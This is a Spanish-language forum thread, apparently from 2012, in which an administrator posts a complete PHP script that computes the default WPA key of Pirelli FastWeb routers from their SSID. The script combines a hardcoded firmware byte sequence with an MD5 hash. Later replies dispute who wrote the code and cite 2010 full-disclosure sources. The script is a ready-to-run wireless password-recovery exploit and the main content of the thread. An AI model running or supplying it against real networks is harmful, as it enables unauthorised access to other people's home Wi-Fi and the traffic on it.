Autor Tema: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)  (Leído 4666 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 17693
    • GNU/Linux Wifislax


Simple Script para saber la clave WPA por defecto de las redes FASTWEB-1-00193EA1B2C3


Código: [Seleccionar]
<?php
/***************************************************************************
 *   FastWeb Pirelli WPA Discovery                                         *
 *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      *
 *                                                                         *
 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          *
 *                                                                         *
 *   You should have received a copy of the GNU General Public License     *
 *   along with this program; if not, write to the                         *
 *   Free Software Foundation, Inc.,                                       *
 *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             *
 ***************************************************************************/

/*
 * SSID di partenza.
 */
$ssid   "FASTWEB-1-00193EA1B2C3";
/*
 * 20 byte costanti cablati nel firmware dei Pirelli Fastweb.
 */
$seq_20 "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";
/*
 * Prelevo la parte finale del SSID.
 */ 
$sn     split'-'$ssid );
$sn     $sn[2];
/*
 * La divido in gruppi di due caratteri, formando un array
 * di 6 rappresentazioni esadecimali di byte.
 */
preg_match_all"/[a-f0-9]{2}/i"$sn$sn_bytes );
$sn_bytes $sn_bytes[0];
/*
 * Inizializzo una stringa con il valore intero di questi byte.
 */
$str "";
for( 
$i 0$i 6$i++ ){
    
$str .= chrhexdec$sn_bytes[$i] ) );
}
echo 
"$str\n";

/* 
 * Aggiungo alla stringa i 20 byte "magici".
 */ 
$str .= $seq_20;
/*
 * Ricavo i byte dell'hash md5 della stringa
 */
preg_match_all"/[a-f0-9]{2}/i"md5($str), $md5_bytes );
$md5_bytes $md5_bytes[0];
$long      "";
/*
 * Converto i byte in sequenze binarie di 8 bit.
 */
foreach( $md5_bytes as $byte ){
    
$long .= sprintf"%08s"decbinhexdec($byte) ) );
}
/*
 * Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero 
 * di un gruppo sia maggiore di 0x0a, aggiungo 0x57.
 */
$hex_5 = array();
for( 
$i 0$i 25$i += ){
    
$n       bindecsubstr$long$i) );
    
$hex_5[] = $n 0x0a $n 0x57 $n;
}
/*
 * Compongo la chiave.
 */ 
$wpa "";
foreach( 
$hex_5 as $hex ){
    
$wpa .= sprintf"%02x"$hex );
}

print 
"WPA : $wpa\n";

?>


« Última modificación: 04-12-2012, 23:09 (Martes) por Hwagm »


aurex

  • Visitante
Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
« Respuesta #1 en: 04-12-2012, 05:27 (Martes) »
¿Como?
¿De P4nd3m0n1um?
Muy fuerte atribuirse un trabajo y un full disclosure viejo de hace dos años del white crew hat...     :-X   ^-^ 
Muy fuerte, con los coemtarios en italiano, lei parla italiano adeso,,.,   >:(  >:(
http://wifiresearchers.wordpress.com/
http://www.oversecurity.net/2010/06/16/algoritmo-della-chiave-wpa-di-alice-e-fastweb/
http://www.nsai.it/2010/06/04/algoritmo-della-chiave-wpa-alice-telecom-italia/?lang=es

script Alice original (2010) > http://www.clshack.it/nopaste/wpa-alice
script routeur fastweb pirelli original (2010)> http://www.clshack.it/nopaste/wpa-pirelli


niroz

  • Visitante
Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
« Respuesta #2 en: 04-12-2012, 16:32 (Martes) »
En realidad P4nd3m0n1um no ha dicho que él sea el autor, sólo ha publicado el código en  http://foro.elhacker.net/hacking_wireless/fastweb_pirelli_wpa_discovery_saber_wpa_redes_fastweb1xxx-t375766.0.html

Creo que es una errata de Hwagm.

Desconectado sanson

  • Moderador Global
  • *
  • Mensajes: 8415
Re: Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
« Respuesta #3 en: 04-12-2012, 21:47 (Martes) »
Así es

Saludos

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 17693
    • GNU/Linux Wifislax
Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
« Respuesta #4 en: 04-12-2012, 23:09 (Martes) »
mil perdones y mis excusas

ya esta editado


aurex

  • Visitante
Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)
« Respuesta #5 en: 05-12-2012, 13:15 (Miércoles) »
La culpa no la tiene hgwan... pero el autor del post original de la otra web, se deben citar los autores del código y poner un link hacía las fuentes. Es lo mínimo.  ;)
Saludos y gracias por rectificar  ;)